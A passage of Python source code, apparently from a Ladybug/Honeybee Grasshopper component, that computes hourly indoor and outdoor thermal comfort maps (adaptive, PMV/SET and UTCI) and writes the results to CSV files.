#To factor in the effect of blocked sunlight, I have to re-make the testPtSkyView and the testPtBlockedVec to reflect the conditions for the given hour.
hourTestPtSkyView, hourTestPtBlockedVec = computeHourShadeDrawing(hour, testPtSkyView, testPtBlockedVec, winShdDict, testPtBlockName, outdoorClac)
pointMRTValues = calculateSolarAdjustedMRT(pointMRTValues, hour, originalHour, diffSolarRad, directSolarRad, globHorizRad, count, sunVecInfo, hourTestPtSkyView, hourTestPtBlockedVec, neutralWinTransList, cloA, floorR, skyPatchMeshes, zoneHasWindows, outdoorClac, lb_comfortModels)
pointMRTValues = lb_preparation.flattenList(pointMRTValues)
radTempMtx[count+1] = pointMRTValues
#Compute the air temperature.
pointAirTempValues = getAirPointValue(airTempDict, testPtZoneWeights, testPtsViewFactor, hour-1, originalHour-1, outdoorClac, prevailingOutdoorTemp)
if mixedAirOverride[hour-1] == 0: pointAirTempValues = warpByHeight(pointAirTempValues, ptHeightWeights, flowVolValues, heatGainValues, adjacentList, adjacentNameList, groupedInletArea, groupedZoneHeights, groupedGlzHeights, groupedWinCeilDiffs, outdoorClac, prevailingOutdoorTemp)
pointAirTempValues = lb_preparation.flattenList(pointAirTempValues)
airTempMtx[count+1] = pointAirTempValues
#Compute the operative temperature.
pointOpTempValues = []
for ptCount, airTemp in enumerate(pointAirTempValues):
pointOpTempValues.append((airTemp+pointMRTValues[ptCount])/2)
operativeTempMtx[count+1] = pointOpTempValues
#Compute the wind speed.
pointWindSpeedValues = []
if outdoorClac == True:
for pointListCount, pointList in enumerate(testPtsViewFactor):
if pointListCount != len(testPtsViewFactor)-1:
for val in pointList:
windFlowVal = flowVolValues[pointListCount]/projectedAreas[pointListCount]
if allWindSpeedsSame == True: windFlowVal = windFlowVal + winSpeedNumbers[originalHour-1]
else:
windFlowVal = windFlowVal + winSpeedNumbers[pointListCount][originalHour-1]
pointWindSpeedValues.append(windFlowVal)
else:
for valCount, val in enumerate(pointList):
ptWindSpeed = lb_wind.calcWindSpeedBasedOnHeight(outWindSpeed[originalHour-1], outdoorPtHeightWeights[valCount], d, a, 270, 0.14)
pointWindSpeedValues.append(ptWindSpeed)
else:
for pointListCount, pointList in enumerate(testPtsViewFactor):
for val in pointList:
windFlowVal = flowVolValues[pointListCount]/projectedAreas[pointListCount]
if allWindSpeedsSame == True: windFlowVal = windFlowVal + winSpeedNumbers[originalHour-1]
else: windFlowVal = windFlowVal + winSpeedNumbers[pointListCount][originalHour-1]
pointWindSpeedValues.append(windFlowVal)
#Compute the adaptive comfort and deg from target.
adaptComfPointValues = []
degFromTargetPointValues = []
for ptCount, airTemp in enumerate(pointAirTempValues):
if ASHRAEorEN == True: comfTemp, distFromTarget, lowTemp, upTemp, comf, condition = lb_comfortModels.comfAdaptiveComfortASH55(airTemp, pointMRTValues[ptCount], prevailTemp[originalHour-1], pointWindSpeedValues[ptCount], comfClass, levelOfConditioning)
else: comfTemp, distFromTarget, lowTemp, upTemp, comf, condition = lb_comfortModels.comfAdaptiveComfortEN15251(airTemp, pointMRTValues[ptCount], prevailTemp[originalHour-1], pointWindSpeedValues[ptCount], comfClass, levelOfConditioning)
adaptComfPointValues.append(int(comf))
degFromTargetPointValues.append(distFromTarget)
adaptComfMtx[count+1] = adaptComfPointValues
degFromTargetMtx[count+1] = degFromTargetPointValues
#Run through every hour of the analysis to fill up the matrices.
if parallel_ == True and len(HOYs) != 1:
tasks.Parallel.ForEach(range(len(HOYs)), climateMap)
else:
for hour in range(len(HOYs)):
#Ability to cancel with Esc
#if gh.GH_Document.IsEscapeKeyDown(): assert False
climateMap(hour)
except:
print "The calculation has been terminated by the user!"
e = gh.GH_RuntimeMessageLevel.Warning
ghenv.Component.AddRuntimeMessage(e, "The calculation has been terminated by the user!")
calcCancelled = True
if calcCancelled == False:
return radTempMtx, airTempMtx, operativeTempMtx, adaptComfMtx, degFromTargetMtx
else:
return -1
def mainPMV(HOYs, analysisPeriod, srfTempNumbers, srfTempHeaders, airTempDataNumbers, airTempDataHeaders, flowVolDataHeaders, flowVolDataNumbers, heatGainDataHeaders, heatGainDataNumbers, relHumidDataHeaders, relHumidDataNumbers, clothingLevel, metabolicRate, zoneSrfNames, testPtsViewFactor, viewFactorMesh, latitude, longitude, timeZone, diffSolarRad, directSolarRad, globHorizRad, testPtSkyView, testPtBlockedVec, numSkyPatchDivs, winTrans, cloA, floorR, testPtZoneNames, testPtZoneWeights, ptHeightWeights, zoneInletInfo, inletHeightOverride, PPDComfortThresh, humidRatioUp, humidRatioLow, mixedAirOverride, zoneHasWindows, outdoorClac, outSrfTempHeaders, outSrfTempNumbers, outdoorNonSrfViewFac, outDryBulbTemp, outRelHumid, outWindSpeed, d, a, outdoorPtHeightWeights, allWindowShadesSame, winStatusHeaders, testPtBlockName, zoneWindowTransmiss, zoneWindowNames, allWindSpeedsSame, winSpeedNumbers, dataAnalysisPeriod, lb_preparation, lb_sunpath, lb_comfortModels, lb_wind):
#Set up matrices to be filled.
radTempMtx = ['Radiant Temperature;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
airTempMtx = ['Air Temperature;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
SET_Mtx = ['Standard Effective Temperature;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
PMVComfMtx = ['PMV Thermal Comfort Percent;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
PMV_Mtx = ['Predicted Mean Vote;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
#Check the data anlysis period and subtract the start day from each of the HOYs.
originalHOYs = []
if dataAnalysisPeriod != [(1,1,1),(12,31,24)]:
FinalHOYs, mon, days = lb_preparation.getHOYsBasedOnPeriod(dataAnalysisPeriod, 1)
for hCount, hour in enumerate(HOYs):
originalHOYs.append(hour)
HOYs[hCount] = hour - FinalHOYs[0]
else: originalHOYs = HOYs
#Check to be sure that the requested analysis period and the analysis period of the connected data align.
periodsAlign = True
for hour in HOYs:
if hour < 0: periodsAlign = False
try: srfTempNumbers[0][hour-1]
except: periodsAlign = False
if periodsAlign == False:
warning = 'The analysis period of the energy simulation data and the analysisPeriodOrHOY_ plugged into this component do not align.'
print warning
ghenv.Component.AddRuntimeMessage(w, warning)
return -1
else:
#Create placeholders for all of the hours.
for hour in HOYs:
radTempMtx.append(0)
airTempMtx.append(0)
SET_Mtx.append(0)
PMVComfMtx.append(0)
PMV_Mtx.append(0)
#Make sure that the EPW Data does not include headers.
outDryBulbTemp = outDryBulbTemp[7:]
outRelHumid = outRelHumid[7:]
outWindSpeed = outWindSpeed[7:]
#Make a dictionary that will relate the zoneSrfNames to the srfTempValues.
srfTempDict = createSrfDict(zoneSrfNames, "srfName", "srfTemp", srfTempHeaders, srfTempNumbers)
#Make a dictionary for outdoor srfNames and temperatures.
if outdoorClac == True:
outSrfTempDict = createSrfDict(zoneSrfNames, "srfName", "srfTemp", outSrfTempHeaders, outSrfTempNumbers)
else: outSrfTempDict = {}
#If there are different shade statuses for the different windows, make a neutral winTrans list for this case.
neutralWinTransList = []
winShdDict = {}
if allWindowShadesSame == False:
for hr in range(8760): neutralWinTransList.append(1)
winShdDict = createShdDict(winStatusHeaders, winTrans, zoneWindowTransmiss, zoneWindowNames)
#Make sure that there are windows in the model and a good reason to generate solar outputs.
if sum(zoneHasWindows) != 0:
#Create a meshed sky dome to assist with direct sunlight falling on occupants.
skyPatches = lb_preparation.generateSkyGeo(rc.Geometry.Point3d.Origin, numSkyPatchDivs, .5)
skyPatchMeshes = []
for patch in skyPatches:
skyPatchMeshes.append(rc.Geometry.Mesh.CreateFromBrep(patch, rc.Geometry.MeshingParameters.Coarse)[0])
#Initiate the sun vector calculator.
lb_sunpath.initTheClass(float(latitude), 0.0, rc.Geometry.Point3d.Origin, 100, float(longitude), float(timeZone))
#Calculate the altitude and azimuth of the different hours.
sunVecs = []
altitudes = []
azimuths = []
for hour in originalHOYs:
d, m, t = lb_preparation.hour2Date(hour, True)
lb_sunpath.solInitOutput(m+1, d, t)
altitude = math.degrees(lb_sunpath.solAlt)
azimuth = math.degrees(lb_sunpath.solAz)
if altitude > 0:
sunVec = lb_sunpath.sunReverseVectorCalc()
else: sunVec = None
sunVecs.append(sunVec)
altitudes.append(altitude)
azimuths.append(azimuth)
sunVecInfo = [sunVecs, altitudes, azimuths]
#Make a dictionary that will relate the testPtZoneNames to the air temperatures.
airTempDict = createZoneDict(testPtZoneNames, "zoneName", "airTemp", airTempDataHeaders, airTempDataNumbers)
relHumidDict = createZoneDict(testPtZoneNames, "zoneName", "airTemp", relHumidDataHeaders, relHumidDataNumbers)
#Compute grouped zone properties for air stratification purposes.
adjacentList, adjacentNameList, groupedInletArea, groupedZoneHeights, groupedGlzHeights, groupedWinCeilDiffs, groupedZoneVols = computeGroupedRoomProperties(testPtZoneWeights, testPtZoneNames, zoneInletInfo, inletHeightOverride)
#Compute a generalizable "projected area" to estimate the zone's starting wind speed.
#Note that this projection should ideally be done perpendicularly to the direction of air flow but, since we don't really know the direction of air flow in the zone, we will compute it generally over the whole volume.
projectedAreas = []
for zoneVol in groupedZoneVols:
projLen = math.pow(zoneVol, 1/3)
projArea = projLen*projLen
projectedAreas.append(projArea)
#Run through every hour of the analysis to fill up the matrices.
calcCancelled = False
try:
def climateMapPMV(count):
#Ability to cancel with Esc
if gh.GH_Document.IsEscapeKeyDown(): assert False
# Get the hour.
hour = HOYs[count]
originalHour = originalHOYs[count]
#Select out the relevant air and surface temperatures.
flowVolValues = []
heatGainValues = []
for zoneVal in flowVolDataNumbers: flowVolValues.append(zoneVal[hour-1])
for zoneVal in heatGainDataNumbers: heatGainValues.append(zoneVal[hour-1])
#Compute the radiant temperature.
pointMRTValues = calculatePointMRT(srfTempDict, testPtsViewFactor, hour-1, originalHour-1, outdoorClac, outSrfTempDict, outdoorNonSrfViewFac, outDryBulbTemp)
if sum(zoneHasWindows) != 0:
if allWindowShadesSame == True: pointMRTValues = calculateSolarAdjustedMRT(pointMRTValues, hour, originalHour, diffSolarRad, directSolarRad, globHorizRad, count, sunVecInfo, testPtSkyView, testPtBlockedVec, winTrans, cloA, floorR, skyPatchMeshes, zoneHasWindows, outdoorClac, lb_comfortModels)
else:
#To factor in the effect of blocked sunlight, I have to re-make the testPtSkyView and the testPtBlockedVec to reflect the conditions for the given hour.
hourTestPtSkyView, hourTestPtBlockedVec = computeHourShadeDrawing(hour, testPtSkyView, testPtBlockedVec, winShdDict, testPtBlockName, outdoorClac)
pointMRTValues = calculateSolarAdjustedMRT(pointMRTValues, hour, originalHour, diffSolarRad, directSolarRad, globHorizRad, count, sunVecInfo, hourTestPtSkyView, hourTestPtBlockedVec, neutralWinTransList, cloA, floorR, skyPatchMeshes, zoneHasWindows, outdoorClac, lb_comfortModels)
pointMRTValues = lb_preparation.flattenList(pointMRTValues)
radTempMtx[count+1] = pointMRTValues
#Compute the air temperature.
pointAirTempValues = getAirPointValue(airTempDict, testPtZoneWeights, testPtsViewFactor, hour-1, originalHour-1, outdoorClac, outDryBulbTemp)
if mixedAirOverride[hour-1] == 0: pointAirTempValues = warpByHeight(pointAirTempValues, ptHeightWeights, flowVolValues, heatGainValues, adjacentList, adjacentNameList, groupedInletArea, groupedZoneHeights, groupedGlzHeights, groupedWinCeilDiffs, outdoorClac, outDryBulbTemp)
pointAirTempValues = lb_preparation.flattenList(pointAirTempValues)
airTempMtx[count+1] = pointAirTempValues
#Compute the relative humidity.
pointRelHumidValues = getAirPointValue(relHumidDict, testPtZoneWeights, testPtsViewFactor, hour-1, originalHour-1, outdoorClac, outRelHumid)
pointRelHumidValues = lb_preparation.flattenList(pointRelHumidValues)
#Compute the wind speed.
pointWindSpeedValues = []
if outdoorClac == True:
for pointListCount, pointList in enumerate(testPtsViewFactor):
if pointListCount != len(testPtsViewFactor)-1:
for val in pointList:
windFlowVal = flowVolValues[pointListCount]/projectedAreas[pointListCount]
if allWindSpeedsSame == True: windFlowVal = windFlowVal + winSpeedNumbers[originalHour-1]
else:
windFlowVal = windFlowVal + winSpeedNumbers[pointListCount][originalHour-1]
pointWindSpeedValues.append(windFlowVal)
else:
for valCount, val in enumerate(pointList):
ptWindSpeed = lb_wind.calcWindSpeedBasedOnHeight(outWindSpeed[originalHour-1], outdoorPtHeightWeights[valCount], d, a, 270, 0.14)
pointWindSpeedValues.append(ptWindSpeed)
else:
for pointListCount, pointList in enumerate(testPtsViewFactor):
for val in pointList:
windFlowVal = flowVolValues[pointListCount]/projectedAreas[pointListCount]
if allWindSpeedsSame == True: windFlowVal = windFlowVal + winSpeedNumbers[originalHour-1]
else: windFlowVal = windFlowVal + winSpeedNumbers[pointListCount][originalHour-1]
pointWindSpeedValues.append(windFlowVal)
#Compute the SET and PMV comfort.
setPointValues = []
pmvComfPointValues = []
pmvPointValues = []
for ptCount, airTemp in enumerate(pointAirTempValues):
try:
pmv, ppd, set, taAdj, coolingEffect = lb_comfortModels.comfPMVElevatedAirspeed(airTemp, pointMRTValues[ptCount], pointWindSpeedValues[ptCount], pointRelHumidValues[ptCount], metabolicRate[originalHour-1], clothingLevel[originalHour-1], 0.0)
except:
print 'These conditions caused a failure of the PMV model convergence: Ta = ' + str(airTemp) + "; Tr = " + str(pointMRTValues[ptCount]) + "; Vel = " + str(pointWindSpeedValues[ptCount]) + "; RH = " + str(pointRelHumidValues[ptCount]) + "; met = " + str(metabolicRate[originalHour-1]) + "; clo= " + str(clothingLevel[originalHour-1])
pmv, ppd, set, taAdj, coolingEffect = 0.0, 5.0, 21.0, 0.0, 0.0
setPointValues.append(set)
if humidRatioUp != 0.03 or humidRatioLow != 0.0:
HR, EN, vapPress, satPress = lb_comfortModels.calcHumidRatio(airTemp, pointRelHumidValues[ptCount], 101325)
if ppd < PPDComfortThresh and HR < humidRatioUp and HR > humidRatioLow: comfortableOrNot.append(1)
else: comfortableOrNot.append(0)
else:
if ppd < PPDComfortThresh: pmvComfPointValues.append(1)
else: pmvComfPointValues.append(0)
pmvPointValues.append(pmv)
SET_Mtx[count+1] = setPointValues
PMVComfMtx[count+1] = pmvComfPointValues
PMV_Mtx[count+1] = pmvPointValues
#Run through every hour of the analysis to fill up the matrices.
if parallel_ == True and len(HOYs) != 1:
tasks.Parallel.ForEach(range(len(HOYs)), climateMapPMV)
else:
for hour in range(len(HOYs)):
#Ability to cancel with Esc
if gh.GH_Document.IsEscapeKeyDown(): assert False
climateMapPMV(hour)
except:
print "The calculation has been terminated by the user!"
e = gh.GH_RuntimeMessageLevel.Warning
ghenv.Component.AddRuntimeMessage(e, "The calculation has been terminated by the user!")
calcCancelled = True
if calcCancelled == False:
return radTempMtx, airTempMtx, SET_Mtx, PMVComfMtx, PMV_Mtx
else:
return -1
def mainUTCI(HOYs, analysisPeriod, srfTempNumbers, srfTempHeaders, airTempDataNumbers, airTempDataHeaders, flowVolDataHeaders, flowVolDataNumbers, heatGainDataHeaders, heatGainDataNumbers, relHumidDataHeaders, relHumidDataNumbers, zoneSrfNames, testPtsViewFactor, viewFactorMesh, latitude, longitude, timeZone, diffSolarRad, directSolarRad, globHorizRad, testPtSkyView, testPtBlockedVec, numSkyPatchDivs, winTrans, cloA, floorR, testPtZoneNames, testPtZoneWeights, ptHeightWeights, zoneInletInfo, inletHeightOverride, mixedAirOverride, zoneHasWindows, outdoorClac, outSrfTempHeaders, outSrfTempNumbers, outdoorNonSrfViewFac, outDryBulbTemp, outRelHumid, outWindSpeed, d, a, outdoorPtHeightWeights, allWindowShadesSame, winStatusHeaders, testPtBlockName, zoneWindowTransmiss, zoneWindowNames, allWindSpeedsSame, winSpeedNumbers, dataAnalysisPeriod, lb_preparation, lb_sunpath, lb_comfortModels, lb_wind):
#Set up matrices to be filled.
radTempMtx = ['Radiant Temperature;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
airTempMtx = ['Air Temperature;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
UTCI_Mtx = ['Universal Thermal Climate Index;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
OutdoorComfMtx = ['Outdoor Thermal Comfort Percent;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
DegFromNeutralMtx = ['Degrees From Neutral UTCI;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
#Check the data anlysis period and subtract the start day from each of the HOYs.
originalHOYs = []
if dataAnalysisPeriod != [(1,1,1),(12,31,24)]:
FinalHOYs, mon, days = lb_preparation.getHOYsBasedOnPeriod(dataAnalysisPeriod, 1)
for hCount, hour in enumerate(HOYs):
originalHOYs.append(hour)
HOYs[hCount] = hour - FinalHOYs[0]
else: originalHOYs = HOYs
#Check to be sure that the requested analysis period and the analysis period of the connected data align.
periodsAlign = True
for hour in HOYs:
if hour < 0: periodsAlign = False
if outdoorClac == True:
try: outSrfTempNumbers[0][hour-1]
except: periodsAlign = False
else:
try: srfTempNumbers[0][hour-1]
except: periodsAlign = False
if periodsAlign == False:
warning = 'The analysis period of the energy simulation data and the analysisPeriodOrHOY_ plugged into this component do not align.'
print warning
ghenv.Component.AddRuntimeMessage(w, warning)
return -1
else:
#Create placeholders for all of the hours.
for hour in HOYs:
radTempMtx.append(0)
airTempMtx.append(0)
UTCI_Mtx.append(0)
OutdoorComfMtx.append(0)
DegFromNeutralMtx.append(0)
#Make sure that the EPW Data does not include headers.
outDryBulbTemp = outDryBulbTemp[7:]
outRelHumid = outRelHumid[7:]
outWindSpeed = outWindSpeed[7:]
#Change the outdoor point heights to be for 10 meters above in order to correctly account for wind speeds.
newOutdoorPtHeightWeights = []
for height in outdoorPtHeightWeights:
newOutdoorPtHeightWeights.append(height+10)
#Make a dictionary that will relate the zoneSrfNames to the srfTempValues.
try: srfTempDict = createSrfDict(zoneSrfNames, "srfName", "srfTemp", srfTempHeaders, srfTempNumbers)
except: srfTempDict = {}
#Make a dictionary for outdoor srfNames and temperatures.
if outdoorClac == True: outSrfTempDict = createSrfDict(zoneSrfNames, "srfName", "srfTemp", outSrfTempHeaders, outSrfTempNumbers)
else: outSrfTempDict = {}
#If there are different shade statuses for the different windows, make a neutral winTrans list for this case.
neutralWinTransList = []
winShdDict = {}
if allWindowShadesSame == False:
for hr in range(8760): neutralWinTransList.append(1)
winShdDict = createShdDict(winStatusHeaders, winTrans, zoneWindowTransmiss, zoneWindowNames)
#Make sure that there are windows in the model and a good reason to generate solar outputs.
if sum(zoneHasWindows) != 0:
#Create a meshed sky dome to assist with direct sunlight falling on occupants.
skyPatches = lb_preparation.generateSkyGeo(rc.Geometry.Point3d.Origin, numSkyPatchDivs, .5)
skyPatchMeshes = []
for patch in skyPatches:
skyPatchMeshes.append(rc.Geometry.Mesh.CreateFromBrep(patch, rc.Geometry.MeshingParameters.Coarse)[0])
#Initiate the sun vector calculator.
lb_sunpath.initTheClass(float(latitude), 0.0, rc.Geometry.Point3d.Origin, 100, float(longitude), float(timeZone))
#Calculate the altitude and azimuth of the different hours.
sunVecs = []
altitudes = []
azimuths = []
for hour in originalHOYs:
d, m, t = lb_preparation.hour2Date(hour, True)
lb_sunpath.solInitOutput(m+1, d, t)
altitude = math.degrees(lb_sunpath.solAlt)
azimuth = math.degrees(lb_sunpath.solAz)
if altitude > 0:
sunVec = lb_sunpath.sunReverseVectorCalc()
else: sunVec = None
sunVecs.append(sunVec)
altitudes.append(altitude)
azimuths.append(azimuth)
sunVecInfo = [sunVecs, altitudes, azimuths]
#Make a dictionary that will relate the testPtZoneNames to the air temperatures.
try: airTempDict = createZoneDict(testPtZoneNames, "zoneName", "airTemp", airTempDataHeaders, airTempDataNumbers)
except: airTempDict = {}
try: relHumidDict = createZoneDict(testPtZoneNames, "zoneName", "airTemp", relHumidDataHeaders, relHumidDataNumbers)
except: relHumidDict = {}
#Compute grouped zone properties for air stratification purposes.
adjacentList, adjacentNameList, groupedInletArea, groupedZoneHeights, groupedGlzHeights, groupedWinCeilDiffs, groupedZoneVols = computeGroupedRoomProperties(testPtZoneWeights, testPtZoneNames, zoneInletInfo, inletHeightOverride)
#Compute a generalizable "projected area" to estimate the zone's starting wind speed.
#Note that this projection should ideally be done perpendicularly to the direction of air flow but, since we don't really know the direction of air flow in the zone, we will compute it generally over the whole volume.
projectedAreas = []
for zoneVol in groupedZoneVols:
projLen = math.pow(zoneVol, 1/3)
projArea = projLen*projLen
projectedAreas.append(projArea)
#Run through every hour of the analysis to fill up the matrices.
calcCancelled = False
#try:
def climateMapUTCI(count):
#Ability to cancel with Esc
if gh.GH_Document.IsEscapeKeyDown(): assert False
# Get the hour.
hour = HOYs[count]
originalHour = originalHOYs[count]
#Select out the relevant air and surface temperatures.
flowVolValues = []
heatGainValues = []
for zoneVal in flowVolDataNumbers: flowVolValues.append(zoneVal[hour-1])
for zoneVal in heatGainDataNumbers: heatGainValues.append(zoneVal[hour-1])
#Compute the radiant temperature.
pointMRTValues = calculatePointMRT(srfTempDict, testPtsViewFactor, hour-1, originalHour-1, outdoorClac, outSrfTempDict, outdoorNonSrfViewFac, outDryBulbTemp)
if sum(zoneHasWindows) != 0:
if allWindowShadesSame == True: pointMRTValues = calculateSolarAdjustedMRT(pointMRTValues, hour, originalHour, diffSolarRad, directSolarRad, globHorizRad, count, sunVecInfo, testPtSkyView, testPtBlockedVec, winTrans, cloA, floorR, skyPatchMeshes, zoneHasWindows, outdoorClac, lb_comfortModels)
else:
#To factor in the effect of blocked sunlight, I have to re-make the testPtSkyView and the testPtBlockedVec to reflect the conditions for the given hour.
hourTestPtSkyView, hourTestPtBlockedVec = computeHourShadeDrawing(hour, testPtSkyView, testPtBlockedVec, winShdDict, testPtBlockName, outdoorClac)
pointMRTValues = calculateSolarAdjustedMRT(pointMRTValues, hour, originalHour, diffSolarRad, directSolarRad, globHorizRad, count, sunVecInfo, hourTestPtSkyView, hourTestPtBlockedVec, neutralWinTransList, cloA, floorR, skyPatchMeshes, zoneHasWindows, outdoorClac, lb_comfortModels)
pointMRTValues = lb_preparation.flattenList(pointMRTValues)
radTempMtx[count+1] = pointMRTValues
#Compute the air temperature.
pointAirTempValues = getAirPointValue(airTempDict, testPtZoneWeights, testPtsViewFactor, hour-1, originalHour-1, outdoorClac, outDryBulbTemp)
if mixedAirOverride[hour-1] == 0: pointAirTempValues = warpByHeight(pointAirTempValues, ptHeightWeights, flowVolValues, heatGainValues, adjacentList, adjacentNameList, groupedInletArea, groupedZoneHeights, groupedGlzHeights, groupedWinCeilDiffs, outdoorClac, outDryBulbTemp)
pointAirTempValues = lb_preparation.flattenList(pointAirTempValues)
airTempMtx[count+1] = pointAirTempValues
#Compute the relative humidity.
pointRelHumidValues = getAirPointValue(relHumidDict, testPtZoneWeights, testPtsViewFactor, hour-1, originalHour-1, outdoorClac, outRelHumid)
pointRelHumidValues = lb_preparation.flattenList(pointRelHumidValues)
#Compute the wind speed.
pointWindSpeedValues = []
if outdoorClac == True:
for pointListCount, pointList in enumerate(testPtsViewFactor):
if pointListCount != len(testPtsViewFactor)-1:
for val in pointList:
windFlowVal = flowVolValues[pointListCount]/projectedAreas[pointListCount]
if allWindSpeedsSame == True: windFlowVal = windFlowVal + winSpeedNumbers[originalHour-1]
else:
windFlowVal = windFlowVal + winSpeedNumbers[pointListCount][originalHour-1]
pointWindSpeedValues.append(windFlowVal)
else:
for valCount, val in enumerate(pointList):
ptWindSpeed = lb_wind.calcWindSpeedBasedOnHeight(outWindSpeed[originalHour-1], newOutdoorPtHeightWeights[valCount], d, a, 270, 0.14)
pointWindSpeedValues.append(ptWindSpeed)
else:
for pointListCount, pointList in enumerate(testPtsViewFactor):
for val in pointList:
windFlowVal = flowVolValues[pointListCount]/projectedAreas[pointListCount]
if allWindSpeedsSame == True: windFlowVal = windFlowVal + winSpeedNumbers[originalHour-1]
else: windFlowVal = windFlowVal + winSpeedNumbers[pointListCount][originalHour-1]
pointWindSpeedValues.append(windFlowVal)
#Compute the SET and PMV comfort.
utciPointValues = []
outdoorComfPointValues = []
degNeutralPointValues = []
for ptCount, airTemp in enumerate(pointAirTempValues):
utci, comf, condition, stressVal = lb_comfortModels.comfUTCI(airTemp, pointMRTValues[ptCount], pointWindSpeedValues[ptCount], pointRelHumidValues[ptCount])
utciPointValues.append(utci)
outdoorComfPointValues.append(comf)
degNeutralPointValues.append(utci-20)
UTCI_Mtx[count+1] = utciPointValues
OutdoorComfMtx[count+1] = outdoorComfPointValues
DegFromNeutralMtx[count+1] = degNeutralPointValues
#Run through every hour of the analysis to fill up the matrices.
if parallel_ == True and len(HOYs) != 1:
tasks.Parallel.ForEach(range(len(HOYs)), climateMapUTCI)
else:
for hour in range(len(HOYs)):
#Ability to cancel with Esc
if gh.GH_Document.IsEscapeKeyDown(): assert False
climateMapUTCI(hour)
#except:
# print "The calculation has been terminated by the user!"
# e = gh.GH_RuntimeMessageLevel.Warning
# ghenv.Component.AddRuntimeMessage(e, "The calculation has been terminated by the user!")
# calcCancelled = True
if calcCancelled == False:
return radTempMtx, airTempMtx, UTCI_Mtx, OutdoorComfMtx, DegFromNeutralMtx
else:
return -1
def writeCSVAdapt(lb_preparation, directory, fileName, radTempMtx, airTempMtx, operativeTempMtx, adaptComfMtx, degFromTargetMtx):
#Find out the number of values in each hour.
valLen = len(radTempMtx[-1])-1
#Set up a working directory.
workingDir = lb_preparation.makeWorkingDir(os.path.join(directory))
#Create a csv Files.
radTempFile = fileName + "RadiantTemp.csv"
airTempFile = fileName + "AirTemp.csv"
opTempFile = fileName + "OperativeTemp.csv"
adaptComfFile = fileName + "AdaptComf.csv"
degFromTargetFile = fileName + "DegFromTarget.csv"
#Write the radiant temperature result file.
if writeResultFile_ != 2:
radTempResult = os.path.join(workingDir, radTempFile)
radCSVfile = open(radTempResult, 'wb')
for lineCount, line in enumerate(radTempMtx):
lineStr = ''
if lineCount != 0:
for valCt, val in enumerate(line):
if valCt != valLen: lineStr = lineStr + str(val) + ','
else: lineStr = lineStr + str(val) + "\n"
radCSVfile.write(lineStr)
else: radCSVfile.write(line + "\n")
radCSVfile.close()
else:
radTempResult = None
#Write the air temperature result file.
if writeResultFile_ != 2:
airTempResult = os.path.join(workingDir, airTempFile)
airCSVfile = open(airTempResult, 'wb')
for lineCount, line in enumerate(airTempMtx):
lineStr = ''
if lineCount != 0:
for valCt, val in enumerate(line):
if valCt != valLen: lineStr = lineStr + str(val) + ','
else: lineStr = lineStr + str(val) + "\n"
airCSVfile.write(lineStr)
else: airCSVfile.write(line + "\n")
airCSVfile.close()
else:
airTempResult = None
#Write the operative temperature result file.
if writeResultFile_ != 2:
operativeTempResult = os.path.join(workingDir, opTempFile)
opCSVfile = open(operativeTempResult, 'wb')
for lineCount, line in enumerate(operativeTempMtx):
lineStr = ''
if lineCount != 0:
for valCt, val in enumerate(line):
if valCt != valLen: lineStr = lineStr + str(val) + ','
else: lineStr = lineStr + str(val) + "\n"
opCSVfile.write(lineStr)
else: opCSVfile.write(line + "\n")
opCSVfile.close()
else:
operativeTempResult = None
#Write the adaptive comfort result file.
adaptComfResult = os.path.join(workingDir, adaptComfFile)
comfCSVfile = open(adaptComfResult, 'wb')
for lineCount, line in enumerate(adaptComfMtx):
lineStr = ''
if lineCount != 0:
for valCt, val in enumerate(line):
if valCt != valLen: lineStr = lineStr + str(val) + ','
else: lineStr = lineStr + str(val) + "\n"
comfCSVfile.write(lineStr)
else: comfCSVfile.write(line + "\n")
comfCSVfile.close()
#Write the deg from target result file.
degFromTargetResult = os.path.join(workingDir, degFromTargetFile)
degCSVfile = open(degFromTargetResult, 'wb')
for lineCount, line in enumerate(degFromTargetMtx):
lineStr = ''
if lineCount != 0:
for valCt, val in enumerate(line):
if valCt != valLen: lineStr = lineStr + str(val) + ','
else: lineStr = lineStr + str(val) + "\n"
degCSVfile.write(lineStr)
else: degCSVfile.write(line + "\n")
degCSVfile.close()
return radTempResult, airTempResult, operativeTempResult, adaptComfResult, degFromTargetResult
def writeCSVPMV(lb_preparation, directory, fileName, radTempMtx, airTempMtx, SET_Mtx, PMVComfMtx, PMV_Mtx):
#Find out the number of values in each hour.
valLen = len(radTempMtx[-1])-1
#Set up a working directory.
workingDir = lb_preparation.makeWorkingDir(os.path.join(directory))
#Create a csv Files.
radTempFile = fileName + "RadiantTemp.csv"
airTempFile = fileName + "AirTemp.csv"
SETFile = fileName + "SET.csv"
PPDFile = fileName + "PPD.csv"
PMVFile = fileName + "PMV.csv"
#Write the radiant temperature result file.
if writeResultFile_ != 2:
radTempResult = os.path.join(workingDir, radTempFile)
radCSVfile = open(radTempResult, 'wb')
for lineCount, line in enumerate(radTempMtx):
lineStr = ''
if lineCount != 0:
for valCt, val in enumerate(line):
if valCt != valLen: lineStr = lineStr + str(val) + ','
else: lineStr = lineStr + str(val) + "\n"
radCSVfile.write(lineStr)
else: radCSVfile.write(line + "\n")
radCSVfile.close()
else:
radTempResult = None
#Write the air temperature result file.
if writeResultFile_ != 2:
airTempResult = os.path.join(workingDir, airTempFile)
airCSVfile = open(airTempResult, 'wb')
for lineCount, line in enumerate(airTempMtx):
lineStr = ''
if lineCount != 0:
for valCt, val in enumerate(line):
if valCt != valLen: lineStr = lineStr + str(val) + ','
else: lineStr = lineStr + str(val) + "\n"
airCSVfile.write(lineStr)
else: airCSVfile.write(line + "\n")
airCSVfile.close()
else:
airTempResult = None
#Write the operative temperature result file.
if writeResultFile_ != 2:
SET_Result = os.path.join(workingDir, SETFile)
opCSVfile = open(SET_Result, 'wb')
for lineCount, line in enumerate(SET_Mtx):
lineStr = ''
if lineCount != 0:
for valCt, val in enumerate(line):
if valCt != valLen: lineStr = lineStr + str(val) + ','
else: lineStr = lineStr + str(val) + "\n"
opCSVfile.write(lineStr)
else: opCSVfile.write(line + "\n")
opCSVfile.close()
else:
SET_Result = None
